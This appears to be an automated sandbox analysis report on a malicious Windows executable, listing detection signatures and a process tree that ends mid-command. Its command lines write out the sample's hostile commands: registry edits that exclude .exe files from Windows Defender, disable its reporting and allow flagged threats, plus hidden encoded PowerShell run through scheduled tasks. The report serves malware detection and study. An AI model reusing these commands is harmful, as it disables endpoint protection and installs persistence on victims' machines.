Edit tour
Windows
Analysis Report
file.exe
Overview
General Information
Detection
Score: | 88 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Multi AV Scanner detection for dropped file
Uses cmd line tools excessively to alter registry or file data
Encrypted powershell cmdline option found
Very long command line found
Suspicious powershell command line found
Modifies Group Policy settings
Uses schtasks.exe or at.exe to add and modify task schedules
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Deletes files inside the Windows folder
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
PE file contains sections with non-standard names
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Creates job files (autostart)
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Contains capabilities to detect virtual machines
Uses reg.exe to modify the Windows registry
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Classification
- System is w10x64
- file.exe (PID: 5716 cmdline:
C:\Users\u ser\Deskto p\file.exe MD5: 2D9B13584AB871C81FF24C473468CFFA) - Install.exe (PID: 5652 cmdline:
.\Install. exe MD5: 3ADC95B09B9644E908114624326E8D0B) - Install.exe (PID: 5704 cmdline:
.\Install. exe /S /si te_id "525 403" MD5: 6F52A47480DAE7C97A64DD5AEBB8E426) - forfiles.exe (PID: 5644 cmdline:
C:\Windows \System32\ forfiles.e xe" /p c:\ windows\sy stem32 /m cmd.exe /c "cmd /C R EG ADD \"H KLM\SOFTWA RE\Policie s\Microsof t\Windows Defender\E xclusions\ Extensions \" /f /v \ "exe\" /t REG_SZ /d 0 /reg:32& REG ADD \" HKLM\SOFTW ARE\Polici es\Microso ft\Windows Defender\ Exclusions \Extension s\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64 & MD5: 4329CB18F8F74CC8DDE2C858BB80E5D8) - conhost.exe (PID: 5620 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - cmd.exe (PID: 4504 cmdline:
/C REG ADD "HKLM\SOF TWARE\Poli cies\Micro soft\Windo ws Defende r\Exclusio ns\Extensi ons" /f /v "exe" /t REG_SZ /d 0 /reg:32& REG ADD "H KLM\SOFTWA RE\Policie s\Microsof t\Windows Defender\E xclusions\ Extensions " /f /v "e xe" /t REG _SZ /d 0 / reg:64& MD5: F3BDBE3BB6F734E357235F4D5898582D) - reg.exe (PID: 6036 cmdline:
REG ADD "H KLM\SOFTWA RE\Policie s\Microsof t\Windows Defender\E xclusions\ Extensions " /f /v "e xe" /t REG _SZ /d 0 / reg:32 MD5: CEE2A7E57DF2A159A065A34913A055C2) - reg.exe (PID: 5976 cmdline:
REG ADD "H KLM\SOFTWA RE\Policie s\Microsof t\Windows Defender\E xclusions\ Extensions " /f /v "e xe" /t REG _SZ /d 0 / reg:64 MD5: CEE2A7E57DF2A159A065A34913A055C2) - forfiles.exe (PID: 5616 cmdline:
C:\Windows \System32\ forfiles.e xe" /p c:\ windows\sy stem32 /m cmd.exe /c "cmd /C R EG ADD \"H KLM\SOFTWA RE\Policie s\Microsof t\Windows Defender\S pynet\" /f /v \"SpyN etReportin g\" /t REG _DWORD /d 0 /reg:32& REG ADD \" HKLM\SOFTW ARE\Polici es\Microso ft\Windows Defender\ Spynet\" / f /v \"Spy NetReporti ng\" /t RE G_DWORD /d 0 /reg:64 & MD5: 4329CB18F8F74CC8DDE2C858BB80E5D8) - conhost.exe (PID: 5520 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - cmd.exe (PID: 4672 cmdline:
/C REG ADD "HKLM\SOF TWARE\Poli cies\Micro soft\Windo ws Defende r\Spynet" /f /v "Spy NetReporti ng" /t REG _DWORD /d 0 /reg:32& REG ADD "H KLM\SOFTWA RE\Policie s\Microsof t\Windows Defender\S pynet" /f /v "SpyNet Reporting" /t REG_DW ORD /d 0 / reg:64& MD5: F3BDBE3BB6F734E357235F4D5898582D) - reg.exe (PID: 5988 cmdline:
REG ADD "H KLM\SOFTWA RE\Policie s\Microsof t\Windows Defender\S pynet" /f /v "SpyNet Reporting" /t REG_DW ORD /d 0 / reg:32 MD5: CEE2A7E57DF2A159A065A34913A055C2) - reg.exe (PID: 4708 cmdline:
REG ADD "H KLM\SOFTWA RE\Policie s\Microsof t\Windows Defender\S pynet" /f /v "SpyNet Reporting" /t REG_DW ORD /d 0 / reg:64 MD5: CEE2A7E57DF2A159A065A34913A055C2) - schtasks.exe (PID: 6016 cmdline:
schtasks / CREATE /TN "gqlLYiBS q" /SC onc e /ST 05:5 6:18 /F /R U "user" / TR "powers hell -Wind owStyle Hi dden -Enco dedCommand cwB0AGEAc gB0AC0AcAB yAG8AYwBlA HMAcwAgAC0 AVwBpAG4AZ ABvAHcAUwB 0AHkAbABlA CAASABpAGQ AZABlAG4AI ABnAHAAdQB wAGQAYQB0A GUALgBlAHg AZQAgAC8AZ gBvAHIAYwB lAA==" MD5: 15FF7D8324231381BAD48A052F85DF04) - conhost.exe (PID: 5876 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - schtasks.exe (PID: 1416 cmdline:
schtasks / run /I /tn "gqlLYiBS q" MD5: 15FF7D8324231381BAD48A052F85DF04) - conhost.exe (PID: 3468 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - schtasks.exe (PID: 2044 cmdline:
schtasks / DELETE /F /TN "gqlLY iBSq" MD5: 15FF7D8324231381BAD48A052F85DF04) - conhost.exe (PID: 1852 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - schtasks.exe (PID: 4580 cmdline:
schtasks / CREATE /TN "bGZpGlqv DNKjraWjlZ " /SC once /ST 17:28 :00 /RU "S YSTEM" /TR "\"C:\Use rs\user\Ap pData\Loca l\Temp\LhL AIbjVjtdXS eCjh\NRKtM pzzQqeBbPa \iZqzyKf.e xe\" d8 /s ite_id 525 403 /S" /V 1 /F MD5: 15FF7D8324231381BAD48A052F85DF04) - conhost.exe (PID: 2868 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- powershell.exe (PID: 5672 cmdline:
C:\Windows \System32\ WindowsPow erShell\v1 .0\powersh ell.EXE -W indowStyle Hidden -E ncodedComm and cwB0AG EAcgB0AC0A cAByAG8AYw BlAHMAcwAg AC0AVwBpAG 4AZABvAHcA UwB0AHkAbA BlACAASABp AGQAZABlAG 4AIABnAHAA dQBwAGQAYQ B0AGUALgBl AHgAZQAgAC 8AZgBvAHIA YwBlAA== MD5: 95000560239032BC68B4C2FDFCDEF913) - conhost.exe (PID: 5808 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - gpupdate.exe (PID: 1268 cmdline:
"C:\Window s\system32 \gpupdate. exe" /forc e MD5: 47C68FE26B0188CDD80F744F7405FF26) - conhost.exe (PID: 4364 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- gpscript.exe (PID: 1408 cmdline:
gpscript.e xe /Refres hSystemPar am MD5: C48CBDC676E442BAF58920C5B7E556DE)
- iZqzyKf.exe (PID: 5100 cmdline:
C:\Users\u ser\AppDat a\Local\Te mp\LhLAIbj VjtdXSeCjh \NRKtMpzzQ qeBbPa\iZq zyKf.exe d 8 /site_id 525403 /S MD5: 6F52A47480DAE7C97A64DD5AEBB8E426) - powershell.exe (PID: 1084 cmdline:
powershell "cmd /C R EG ADD \"H KLM\SOFTWA RE\Policie s\Microsof t\Windows Defender\T hreats\Thr eatIDDefau ltAction\" /f /v \"2 25451\" /t REG_SZ /d 6 /reg:32 ;REG ADD \ "HKLM\SOFT WARE\Polic ies\Micros oft\Window s Defender \Threats\T hreatIDDef aultAction \" /f /v \ "225451\" /t REG_SZ /d 6 /reg: 64;REG ADD \"HKLM\SO FTWARE\Pol icies\Micr osoft\Wind ows Defend er\Threats \ThreatIDD efaultActi on\" /f /v \"256596\ " /t REG_S Z /d 6 /re g:32;REG A DD \"HKLM\ SOFTWARE\P olicies\Mi crosoft\Wi ndows Defe nder\Threa ts\ThreatI DDefaultAc tion\" /f /v \"25659 6\" /t REG _SZ /d 6 / reg:64;REG ADD \"HKL M\SOFTWARE \Policies\ Microsoft\ Windows De fender\Thr eats\Threa tIDDefault Action\" / f /v \"242 872\" /t R EG_SZ /d 6 /reg:32;R EG ADD \"H KLM\SOFTWA RE\Policie s\Microsof t\Windows Defender\T hreats\Thr eatIDDefau ltAction\" /f /v \"2 42872\" /t REG_SZ /d 6 /reg:64 ;REG ADD \ "HKLM\SOFT WARE\Polic ies\Micros oft\Window s Defender \Threats\T hreatIDDef aultAction \" /f /v \ "214774937 3\" /t REG _SZ /d 6 / reg:32;REG ADD \"HKL M\SOFTWARE \Policies\ Microsoft\ Windows De fender\Thr eats\Threa tIDDefault Action\" / f /v \"214 7749373\" /t REG_SZ /d 6 /reg: 64;REG ADD \"HKLM\SO FTWARE\Pol icies\Micr osoft\Wind ows Defend er\Threats \ThreatIDD efaultActi on\" /f /v \"2147807 942\" /t R EG_SZ /d 6 /reg:32;R EG ADD \"H KLM\SOFTWA RE\Policie s\Microsof t\Windows Defender\T hreats\Thr eatIDDefau ltAction\" /f /v \"2 147807942\ " /t REG_S Z /d 6 /re g:64;REG A DD \"HKLM\ SOFTWARE\P olicies\Mi crosoft\Wi ndows Defe nder\Threa ts\ThreatI DDefaultAc tion\" /f /v \"21477 35735\" /t REG_SZ /d 6 /reg:32 ;REG ADD \ "HKLM\SOFT WARE\Polic ies\Micros oft\Window s Defender \Threats\T hreatIDDef aultAction \" /f /v \ "214773573 5\" /t REG _SZ /d 6 / reg:64;REG ADD \"HKL M\SOFTWARE \Policies\ Microsoft\ Windows De fender\Thr eats\Threa tIDDefault Action\" / f /v \"214 7737010\" /t REG_SZ /d 6 /reg: 32;REG ADD \"HKLM\SO FTWARE\Pol icies\Micr osoft\Wind ows Defend er\Threats \ThreatIDD efaultActi on\" /f /v \"2147737 010\" /t R EG_SZ /d 6 /reg:64;R EG ADD \"H KLM\SOFTWA RE\Policie s\Microsof t\Windows Defender\T hreats\Thr eatIDDefau ltAction\" /f /v \"2 147737007\ " /t REG_S Z /d 6 /re g:32;REG A DD \"HKLM\ SOFTWARE\P olicies\Mi crosoft\Wi ndows Defe nder\Threa ts\ThreatI DDefaultAc tion\" /f /v \"21477 37007\" /t REG_SZ /d 6 /reg:64 ;REG ADD \ "HKLM\SOFT WARE\Polic ies\Micros oft\Window s Defender \Threats\T hreatIDDef aultAction \" /f /v \ "214773750 3\" /t REG _SZ /d 6 / reg:32;REG ADD \"HKL M\SOFTWARE \Policies\ Microsoft\ Windows De fender\Thr eats\Threa tIDDefault Action\" / f /v \"214 7737503\" /t REG_SZ /d 6 /reg: 64;REG ADD \"HKLM\SO FTWARE\Pol